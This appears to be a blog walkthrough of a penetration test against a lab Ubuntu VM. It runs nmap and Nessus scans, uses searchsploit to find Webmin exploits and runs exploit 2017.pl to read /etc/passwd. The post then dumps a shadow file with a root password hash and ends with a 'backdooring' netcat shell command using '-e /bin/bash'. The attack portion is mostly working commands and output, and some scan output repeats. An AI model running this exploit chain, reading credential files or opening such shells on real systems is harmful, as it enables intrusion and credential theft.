A. Information Gathering and Service
Enumeration
1.scan dengan nmap
root@BT:~# nmap -v -A 192.168.0.112
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s
elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1
host. at 19:31
Completed Parallel DNS resolution of 1
host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on
192.168.0.112
Discovered open port 80/tcp on
192.168.0.112
Discovered open port 22/tcp on
192.168.0.112
Discovered open port 139/tcp on
192.168.0.112
Discovered open port 10000/tcp on
192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s
elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s
elapsed (5 services on 1 host)
Initiating OS detection (try #1) against
192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT
STATE SERVICE VERSION
22/tcp
open ssh OpenSSH 4.6p1 Debian 5build1 (protocol
2.0)
| ssh-hostkey: 1024
e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048
10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp
open http Apache httpd 2.2.4 ((Ubuntu)
PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title
(text/html).
|_http-methods: No Allow or Public header
in OPTIONS response (status code 200)
139/tcp
open netbios-ssn Samba smbd 3.X
(workgroup: MSHOME)
445/tcp
open netbios-ssn Samba smbd 3.X
(workgroup: MSHOME)
10000/tcp open http
MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header
in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title
(text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5:
1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus
Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30
17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199
(Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE:
cpe:/o:linux:kernel
Host script results:
| nbstat:
|
NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC:
<unknown>
|
Names
|
UBUNTUVM<00> Flags:
<unique><active>
|
UBUNTUVM<03> Flags:
<unique><active>
|
UBUNTUVM<20> Flags:
<unique><active>
|
MSHOME<1e> Flags:
<group><active>
|_
MSHOME<00> Flags:
<group><active>
|_smbv2-enabled: Server doesn't support
SMBv2 protocol
| smb-security-mode:
|
Account that was used for smb scripts: guest
|
User-level authentication
|
SMB Security: Challenge/response passwords supported
|_
Message signing disabled (dangerous, but default)
| smb-os-discovery:
|
OS: Unix (Samba 3.0.26a)
|
Computer name: ubuntuvm
|
Domain name: nsdlab
|
FQDN: ubuntuvm.NSDLAB
|
NetBIOS computer name:
|_
System time: 2012-01-31 02:32:26 UTC-6
TRACEROUTE
HOP RTT
ADDRESS
1
0.70 ms 192.168.0.112
NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from:
/usr/local/bin/../share/nmap
OS and Service detection performed. Please
report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned
in 37.54 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
2.
scan with nessus
NESSUS REPORT
List of PlugIn IDs
The following plugin IDs have problems
associated with them. Select the ID to review more detail.
PLUGIN ID#
|
#
|
PLUGIN NAME
|
SEVERITY
|
32314
|
1
|
Debian OpenSSH/OpenSSL Package Random Number Generator
Weakness
|
High Severity problem(s) found
|
PORT SSH
(22/TCP)
Plugin ID: 32314
Debian OpenSSH/OpenSSL
Package Random Number Generator Weakness
Synopsis
The remote SSH host keys are weak.
List of Hosts
192.168.0.112
Description
The remote SSH host key has been generated on a Debian
or Ubuntu system which contains a bug in the
random number
generator of its OpenSSL library.
The problem is due to a Debian packager
removing nearly all
sources of entropy in the remote version of
OpenSSL.
An attacker can easily obtain the private part
of the remote
key and use this to set up decipher the remote
session or
set up a man in the middle attack.
Solution
Consider all cryptographic material generated on the remote host
to be guessable. In particuliar, all SSH, SSL
and OpenVPN key
material should be re-generated.
See also
Risk Factor
Critical/ CVSS Base Score: 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score: 8.3(CVSS2#E:F/RL:OF/RC:C)
Bugtraq ID
Plugin publication date: 2008/05/14
Plugin last modification date: 2011/03/21
Ease of exploitability : Exploits are
available
Exploitable with: Core Impact
192.168.0.112
|
|
Scan Time
|
|
Start time:
|
Mon Jan 30 19:31:52 2012
|
End time:
|
Mon Jan 30 19:36:04 2012
|
Number of
vulnerabilities
|
|
High
|
1
|
Medium
|
5
|
Low
|
38
|
|
|
Remote Host
Information
|
|
Operating System:
|
Linux Kernel 2.6
|
NetBIOS name:
|
UBUNTUVM
|
IP address:
|
192.168.0.112
|
MAC addresses:
|
08:00:27:aa:ec:6d
|
|
root@BT:~# nmap -v -sN 192.168.0.112
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-30 19:29 WIT
Initiating ARP Ping Scan at 19:29
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:29, 0.06s
elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1
host. at 19:29
Completed Parallel DNS resolution of 1
host. at 19:29, 13.00s elapsed
Initiating NULL Scan at 19:29
Scanning 192.168.0.112 [1000 ports]
Completed NULL Scan at 19:30, 2.37s elapsed
(1000 total ports)
Nmap scan report for 192.168.0.112
Host is up (0.0022s latency).
Not shown: 995 closed ports
PORT
STATE SERVICE
22/tcp
open|filtered ssh
80/tcp
open|filtered http
139/tcp
open|filtered netbios-ssn
445/tcp
open|filtered microsoft-ds
10000/tcp open|filtered snet-sensor-mgmt
MAC Address: 08:00:27:AA:EC:6D (Cadmus
Computer Systems)
Read data files from:
/usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned
in 17.69 seconds
Raw packets sent: 1017 (40.668KB) | Rcvd: 996 (39.828KB)
root@BT:~# nmap -v -A 192.168.0.112
Starting Nmap 5.61TEST4 ( http://nmap.org )
at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s
elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1
host. at 19:31
Completed Parallel DNS resolution of 1
host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on
192.168.0.112
Discovered open port 80/tcp on
192.168.0.112
Discovered open port 22/tcp on
192.168.0.112
Discovered open port 139/tcp on
192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s
elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s
elapsed (5 services on 1 host)
Initiating OS detection (try #1) against
192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT
STATE SERVICE VERSION
22/tcp open
ssh OpenSSH 4.6p1 Debian
5build1 (protocol 2.0)
| ssh-hostkey: 1024
e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048
10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp
open http Apache httpd 2.2.4 ((Ubuntu)
PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title
(text/html).
|_http-methods: No Allow or Public header
in OPTIONS response (status code 200)
139/tcp
open netbios-ssn Samba smbd 3.X
(workgroup: MSHOME)
445/tcp
open netbios-ssn Samba smbd 3.X
(workgroup: MSHOME)
10000/tcp open http
MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header
in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title
(text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5:
1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus
Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30
17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199
(Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE:
cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS
name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|
Names
|
UBUNTUVM<00> Flags:
<unique><active>
|
UBUNTUVM<03> Flags:
<unique><active>
|
UBUNTUVM<20> Flags:
<unique><active>
|
MSHOME<1e> Flags: <group><active>
|_
MSHOME<00> Flags:
<group><active>
|_smbv2-enabled: Server doesn't support
SMBv2 protocol
| smb-security-mode:
|
Account that was used for smb scripts: guest
|
User-level authentication
|
SMB Security: Challenge/response passwords supported
|_
Message signing disabled (dangerous, but default)
| smb-os-discovery:
|
OS: Unix (Samba 3.0.26a)
|
Computer name: ubuntuvm
|
Domain name: nsdlab
|
FQDN: ubuntuvm.NSDLAB
|
NetBIOS computer name:
|_
System time: 2012-01-31 02:32:26 UTC-6
TRACEROUTE
HOP RTT
ADDRESS
1
0.70 ms 192.168.0.112
NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from:
/usr/local/bin/../share/nmap
OS and Service detection performed. Please
report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned
in 37.54 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
1.in the step to write :
root@BT:~# cd /pentest/exploits/exploitdb/
2.type ls to know directory
root@BT:/pentest/exploits/exploitdb# ls
files.csv
platforms searchsploit
3. the next write ./searchsploit
webmin to know file webnim
root@BT:/pentest/exploits/exploitdb#
./searchsploit webmin
Description
Path
---------------------------------------------------------------------------
-------------------------
Webmin BruteForce and Command Execution
Exploit
/multiple/remote/705.pl
Webmin Web Brute Force v1.5
(cgi-version)
/multiple/remote/745.cgi
Webmin BruteForce + Command Execution
v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit
/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit (perl)
/multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File
Include Vulnerability
/php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File
Include Vulnerability
/php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File
Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File
Include Vulnerabilities
/php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File
Include Vulnerabilities
/php/webapps/2462.txt
4. copying file 2017 perl with type cp
platforms/multiple/remote/2017.pl ~
root@BT:/pentest/exploits/exploitdb# cp
platforms/multiple/remote/2017.pl ~
5. quit to pentest with type cd
root@BT:/pentest/exploits/exploitdb# cd
6. see the value folder home
root@BT:~# ls
2017.pl NessusReport21.rtf NessusReport45.rtf subnet
Desktop
NessusReport26.rtf
NessusReport63.rtf VirtualBox VMs
download
NessusReport27.rtf
NessusReport65.rtf workspace
galau.ps NessusReport32.rtf NessusReport66.rtf xpreport.rtf
galau.txt NessusReport35.rtf NessusReport67.rtf
IS2C
NessusReport40.rtf
NessusReport70.rtf
Nessus-4.4.1-ubuntu910_i386.deb NessusReport44.rtf NessusReport.rtf
7. see file 2017.pl
root@BT:~# perl 2017.pl
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 -
> HTTP
1 -
> HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@BT:~# perl 2017.pl 192.168.0.112 10000
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 -
> HTTP
1 -
> HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
8.Open the encryption of password and user
name, with type:perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl
2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at
umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate
PHP!
Attacking http://192.168.0.112 on port
10000!
FILENAME:
/etc/passwd
FILE
CONTENT STARTED
-----------------------------------
-------------------------------------
9. Show all the username and password in
shadow folder, type : cat /etc/shadow
root@BT:~# cat /etc/shadow
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::
backdooring
1.
nc -l -p 1234
2.
nc localhost 1234 -e /bin/bash
Tidak ada komentar:
Posting Komentar